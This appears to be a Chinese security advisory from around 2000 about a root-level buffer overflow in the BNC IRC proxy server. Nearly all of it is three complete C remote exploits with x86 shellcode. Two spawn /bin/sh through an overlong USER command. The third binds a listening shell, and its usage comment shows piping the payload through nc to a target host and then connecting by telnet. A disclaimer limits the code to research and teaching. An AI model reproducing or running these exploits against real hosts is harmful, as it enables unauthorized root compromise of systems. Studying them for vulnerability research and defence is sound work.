发布日期：2000-01-25
更新日期：2000-01-28

受影响系统：

BNC IRC Proxy Server 2.4.4 及以下版本

描述：

---

    BNC IRC代理服务器是一个可代理IRC会话的简单程序。攻击者利用其中的一个缓冲区溢出漏洞可在选种主机上获得root权限。




测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

/* ============================================================== */

/*

bnc remote buffer overflow for linux x86 (w/o stack-non-exec patch)
by duke (duke@viper.net.au)
works on versions < 2.4.4

offsets: slackware: 0 redhat: 400->1000
special thanks to stranJer! :)

greets to everyone (plaguez, horiz0n, dpr, kod, f1ex, sewid, antilove,
tewl, dmess0r, stranJer , all of #!ADM :) and everyone at el8.org )

*/

#include <stdio.h>
#include <string.h>

#define RET 0xbffff814
#define BUFSIZE 2000
#define LEN 1000


char shellcode[] =
"\x33\xdb\x33\xc0\xb0\x29\xcd\x80\x33\xc0\xb0\x29\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

void
main (int argc, char **argv)
{
char buf[BUFSIZE];
int sockfd, i, offset;
if (argc == 2)
{
offset = atoi (argv[1]);
}
else
{
offset = 0;
}
memset (buf, '\x90', BUFSIZE);
for (i = LEN; i < BUFSIZE - 4; i += 4)
*(long *) &buf[i] = RET + offset;
memcpy (buf + (LEN - strlen (shellcode)), shellcode, strlen
(shellcode));
memcpy (buf, "USER ", 5);
printf ("%s", buf);
}

/* ============================================================== */

/*
Remote exploit example for bnc (Irc Proxy v2.2.4 by James Seter)
by duke (duke@viper.net.au)
32sep98 FreeBSD version by stran9er

Greet to
!@$@$A#%$#@!D%$#@!$#M@%%$@%c$!@$#!r!%$@e@$!#$#%w$@#$@#!!!#@$#$%
*/

#include <stdio.h>
#include <string.h>
#include <sys/types.h>

#define ADDR 0xefbfd907
#define RETPTR 1036
#define BUFSIZE 1041
#define SHELLOFFSET 23

char shellcode[] =
/* added by me dup(0);dup(0) */
"\xEB\x0B\\\x9Axxx\\\x07x\xC3\xEB\x05\xE8\xF9\377\377\377"
"\x5E\x33\xDb\x89\x5e\xF2\x88\x5e\xF7\x31\xC0\xB0\x29\x53"
"\xE8\xDE\xFF\xFF\xFF\x33\xC0\xB0\x29\xE8\xD5\xFF\xFF\xFF"
/* generic shellcode */
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

void main (int argc, char **argv)
{
char buf[BUFSIZE+5];
unsigned long int addr = ADDR;
int i;

if (argc > 1) addr += atoi (argv[1]);
fprintf (stderr, "Using address: 0x%X\n", addr);

memset (buf, 0x90, BUFSIZE);
for (i = RETPTR; i < BUFSIZE - 4; i += 4)
*(long *) &buf[i] = addr;
memcpy (buf + (RETPTR - sizeof(shellcode)) - SHELLOFFSET,
shellcode, strlen (shellcode));
buf[BUFSIZE]=0;
printf ("%s/usr/bin/uname -a\n/usr/bin/id\n/bin/pwd\n", buf);
}
/* segodna: 23 sentabra 1998 goda */

/* ============================================================== */

/*
* SDI irc bouncer exploit
*
* This source exploits a buffer overflow in the bnc,
* popular irc bouncer, binding a shell.
*
* Tested against bnc 2.2.4 running on linux.
*
* usage:
* lame:~# gcc SDI-bnc.c -o SDI-bnc
*
* lame:~# (SDI-bnc 0; cat) | nc www.lame.org 666
* `-> offset, zero in most cases
*
* lame:~# telnet www.lame.org 10752
*
*
* by jamez and dumped from sekure SDI (www.sekure.org)
*
* email: securecode@sekure.org
*
* merry christmas and happy 1999 ;)
*
*/

/* c0nd0r :* */
char bindcode[] =
"\x33\xDB\x33\xC0\xB0\x1B\xCD\x80\x33\xD2\x33\xc0\x8b\xDA\xb0\x06"
"\xcd\x80\xfe\xc2\x75\xf4\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x62"
"\xeb\x62\x5e\x56\xac\x3c\xfd\x74\x06\xfe\xc0\x74\x0b\xeb\xf5\xb0"
"\x30\xfe\xc8\x88\x46\xff\xeb\xec\x5e\xb0\x02\x89\x06\xfe\xc8\x89"
"\x46\x04\xb0\x06\x89\x46\x08\xb0\x66\x31\xdb\xfe\xc3\x89\xf1\xcd"
"\x80\x89\x06\xb0\x02\x66\x89\x46\x0c\xb0\x2a\x66\x89\x46\x0e\x8d"
"\x46\x0c\x89\x46\x04\x31\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0"
"\x66\xfe\xc3\xcd\x80\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04\xcd\x80\xeb\x04"
"\xeb\x4c\xeb\x52\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xfe\xc3\xcd\x80"
"\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xfe\xc1\xcd\x80\xb0\x3f\xfe\xc1"
"\xcd\x80\xb8\x2e\x62\x69\x6e\x40\x89\x06\xb8\x2e\x73\x68\x21\x40\x89\x46"
"\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e"
"\x08\x8d\x56\x0c\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x45\xff\xff"
"\xff\xFF\xFD\xFF\x50\x72\x69\x76\x65\x74\x20\x41\x44\x4D\x63\x72\x65\x77";

#define SIZE 1600
#define NOP 0x90

char buffer[SIZE];

void main(int argc, char * argv[])
{
int i, x, offset = 0;
long addr;

if(argc > 1) offset = atoi(argv[1]);

addr = 0xbffff6ff + offset; /* evil addr */

for(i = 0; i < SIZE/3; i++)
buffer[i] = NOP;

for(x = 0; x < strlen(bindcode); i++, x++)
buffer[i] = bindcode[x];

for (; i < SIZE; i += 4)
{
buffer[i ] = addr & 0x000000ff;
buffer[i+1] = (addr & 0x0000ff00) >> 8;
buffer[i+2] = (addr & 0x00ff0000) >> 16;
buffer[i+3] = (addr & 0xff000000) >> 24;
}

buffer[SIZE - 1] = 0;

printf("USER %s\n", buffer);

}



建议：

---

    暂无。请等待新版本或补丁程序。



浏览次数：6960
严重程度：0（网友投票）